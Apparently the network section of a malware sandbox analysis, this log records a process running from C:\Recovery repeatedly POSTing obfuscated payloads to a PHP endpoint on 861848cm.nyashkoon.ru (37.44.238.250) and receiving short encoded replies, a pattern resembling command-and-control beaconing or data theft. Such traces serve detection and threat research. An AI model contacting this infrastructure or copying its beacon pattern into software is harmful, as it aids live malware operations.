                                                                    Nov 6, 2024 03:38:16.032032013 CET1012OUTData Raw: 56 56 5a 5c 53 58 50 5b 5a 5f 52 51 54 59 5b 52 55 5c 59 58 51 5f 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VVZ\SXP[Z_RQTY[RU\YXQ_RXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%8.R?3?)*=)'(7?V(=3X:%+ '!%'X$.Q-*
                                                                    Nov 6, 2024 03:38:16.480392933 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:16.549379110 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    66192.168.2.44988837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:16.800208092 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:17.157448053 CET1012OUTData Raw: 56 56 5a 5d 56 5e 50 58 5a 5f 52 51 54 59 5b 5b 55 56 59 5e 51 52 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VVZ]V^PXZ_RQTY[[UVY^QRRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]-/!? ?38Z=*>=>[0+$Y#?:T+=0-,Y!7>\&'X$.Q-*
                                                                    Nov 6, 2024 03:38:17.601785898 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:17.676377058 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    67192.168.2.44989437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:17.799554110 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:18.157037020 CET1012OUTData Raw: 53 51 5a 58 56 5b 50 5f 5a 5f 52 51 54 5b 5b 53 55 57 59 5d 51 5e 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SQZXV[P_Z_RQT[[SUWY]Q^R]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/,.((3*&)=]'<X ,!?#]-%< '._'9'X$.Q-"
                                                                    Nov 6, 2024 03:38:18.617922068 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:18.694787025 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    68192.168.2.44990037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:18.830717087 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:19.188456059 CET1012OUTData Raw: 56 5f 5a 54 56 5e 50 53 5a 5f 52 51 54 58 5b 5d 55 52 59 5d 51 50 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V_ZTV^PSZ_RQTX[]URY]QPRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^-,=(( +04=![>9%(##<=?#Z: 4')1'X$.Q-.
                                                                    Nov 6, 2024 03:38:19.641052961 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:19.713350058 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    69192.168.2.44990637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:20.096970081 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:20.454619884 CET1008OUTData Raw: 53 51 5f 5b 56 5e 50 59 5a 5f 52 51 54 5a 5b 5f 55 56 59 56 51 51 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SQ_[V^PYZ_RQTZ[_UVYVQQR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,??4+07(*&=*_$ #,"P<.-C8X#42_&9'X$.Q-2
                                                                    Nov 6, 2024 03:38:20.906105042 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:21.413480997 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    70192.168.2.44991637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:21.461157084 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:21.813373089 CET1252OUTData Raw: 56 56 5f 58 56 5e 55 5e 5a 5f 52 51 54 5b 5b 5c 55 56 59 5b 51 57 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VV_XV^U^Z_RQT[[\UVY[QWR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,?U<'?0$]>>>-0+ ?Q?(:%^#'.\%9'X$.Q-"
                                                                    Nov 6, 2024 03:38:22.262053967 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:22.340382099 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 5f 3c 39 2a 12 27 2b 0a 54 2a 2d 2d 13 29 23 3b 17 3b 54 30 5b 3e 30 24 13 2a 16 20 16 23 01 0d 5f 22 31 2e 05 20 0c 2c 02 3f 01 21 5f 05 1d 3a 01 27 17 20 54 3e 31 26 58 3d 27 09 1a 32 23 2b 1b 2a 05 3a 1e 22 3a 08 57 32 00 2e 02 31 0c 27 54 2a 34 2d 16 39 2f 23 1c 27 3a 2a 57 09 16 20 1d 27 55 23 11 2a 1f 23 13 27 10 3e 02 26 14 06 0f 2a 2c 3b 5b 21 34 2a 5d 3e 33 23 12 23 27 22 10 24 5c 26 45 26 2e 05 52 2b 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: _<9*'+T*--)#;;T0[>0$* #_"1. ,?!_:' T>1&X='2#+*:":W2.1'T*4-9/#':*W 'U#*#'>&*,;[!4*]>3##'"$\&E&.R+"&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    71192.168.2.44991737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:21.545860052 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:21.891655922 CET1012OUTData Raw: 56 52 5a 58 56 56 55 5f 5a 5f 52 51 54 5d 5b 59 55 55 59 5f 51 5f 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VRZXVVU_Z_RQT][YUUY_Q_RRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%//.+8Y+7**=[)=*\%(,^#,!).-%#7:^&9'X$.Q-
                                                                    Nov 6, 2024 03:38:22.346046925 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:22.419670105 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    72192.168.2.44992337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:23.055449963 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:23.407013893 CET1012OUTData Raw: 53 55 5a 54 53 5a 55 5d 5a 5f 52 51 54 53 5b 5b 55 50 59 5f 51 52 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZTSZU]Z_RQTS[[UPY_QRR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/)<0?30\*:==0;7 >(X:$ 2\%'X$.Q-
                                                                    Nov 6, 2024 03:38:23.875431061 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:23.946238995 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    73192.168.2.44993237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:24.064076900 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:24.422633886 CET1012OUTData Raw: 53 54 5a 58 56 5d 50 5b 5a 5f 52 51 54 52 5b 59 55 56 59 58 51 57 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: STZXV]P[Z_RQTR[YUVYXQWR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%;6S<(#>3<Z**>->\08,#&P+/96'#$!%)'X$.Q-
                                                                    Nov 6, 2024 03:38:24.874880075 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:24.953320980 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    74192.168.2.44993837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:25.619615078 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:25.969526052 CET1012OUTData Raw: 53 53 5f 5e 53 5b 50 5f 5a 5f 52 51 54 5d 5b 58 55 53 59 5c 51 50 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SS_^S[P_Z_RQT][XUSY\QPRYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%-,.??(4\>>*=:0+7#/%(X/-637"&'X$.Q-
                                                                    Nov 6, 2024 03:38:26.428690910 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:26.505240917 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    75192.168.2.44994837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:27.654742002 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:28.003087044 CET1276OUTData Raw: 56 5e 5a 55 53 5d 50 59 5a 5f 52 51 54 5e 5b 5d 55 5d 59 59 51 51 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V^ZUS]PYZ_RQT^[]U]YYQQR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&-?>(<]?<X>1[*-'+ X7<>V?:<!7*X&'X$.Q-6
                                                                    Nov 6, 2024 03:38:28.499973059 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:28.577785015 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 5d 3f 29 31 00 30 5d 38 1b 3e 3d 3d 5b 3c 0e 38 06 2f 0b 38 12 2a 23 3f 03 3d 06 02 18 34 01 37 5e 22 0c 36 05 23 0c 01 5e 2b 11 21 5f 05 1d 39 1c 33 39 34 57 3d 54 2a 58 2a 09 20 08 32 09 3f 1d 29 05 31 00 23 04 26 11 31 3d 3e 04 32 32 24 0b 3f 34 04 05 3a 3f 0d 1d 31 3a 2a 57 09 16 20 50 25 33 24 03 2a 08 3b 12 24 10 32 00 25 2a 2f 1c 3d 3c 23 11 20 42 22 58 29 23 37 5e 22 19 32 5c 30 3a 31 1a 31 3e 33 50 2b 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: ]?)10]8>==[<8/8*#?=47^"6#^+!_9394W=T*X* 2?)1#&1=>22$?4:?1:*W P%3$*;$2%*/=<# B"X)#7^"2\0:11>3P+2&U" T0]O
                                                                    Nov 6, 2024 03:38:28.817426920 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 5d 3f 29 31 00 30 5d 38 1b 3e 3d 3d 5b 3c 0e 38 06 2f 0b 38 12 2a 23 3f 03 3d 06 02 18 34 01 37 5e 22 0c 36 05 23 0c 01 5e 2b 11 21 5f 05 1d 39 1c 33 39 34 57 3d 54 2a 58 2a 09 20 08 32 09 3f 1d 29 05 31 00 23 04 26 11 31 3d 3e 04 32 32 24 0b 3f 34 04 05 3a 3f 0d 1d 31 3a 2a 57 09 16 20 50 25 33 24 03 2a 08 3b 12 24 10 32 00 25 2a 2f 1c 3d 3c 23 11 20 42 22 58 29 23 37 5e 22 19 32 5c 30 3a 31 1a 31 3e 33 50 2b 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: ]?)10]8>==[<8/8*#?=47^"6#^+!_9394W=T*X* 2?)1#&1=>22$?4:?1:*W P%3$*;$2%*/=<# B"X)#7^"2\0:11>3P+2&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    76192.168.2.44994937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:27.654814959 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:28.003182888 CET1012OUTData Raw: 53 56 5a 59 53 5b 55 5f 5a 5f 52 51 54 58 5b 5f 55 5c 59 5b 51 50 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SVZYS[U_Z_RQTX[_U\Y[QPR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&-?.S?^(_>3)%^>.>\$(8 ,-(X+./ 7.'9'X$.Q-.
                                                                    Nov 6, 2024 03:38:28.468159914 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:28.547694921 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:38:28.817550898 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    77192.168.2.44995537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:28.874754906 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:29.219631910 CET1012OUTData Raw: 56 54 5a 58 56 5b 55 5f 5a 5f 52 51 54 52 5b 5c 55 5c 59 57 51 5f 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VTZXV[U_Z_RQTR[\U\YWQ_R[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8>W+80?0<\=:Z*.%([4?7-C0#&%)'X$.Q-
                                                                    Nov 6, 2024 03:38:29.685631990 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:29.759912014 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    78192.168.2.44996337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
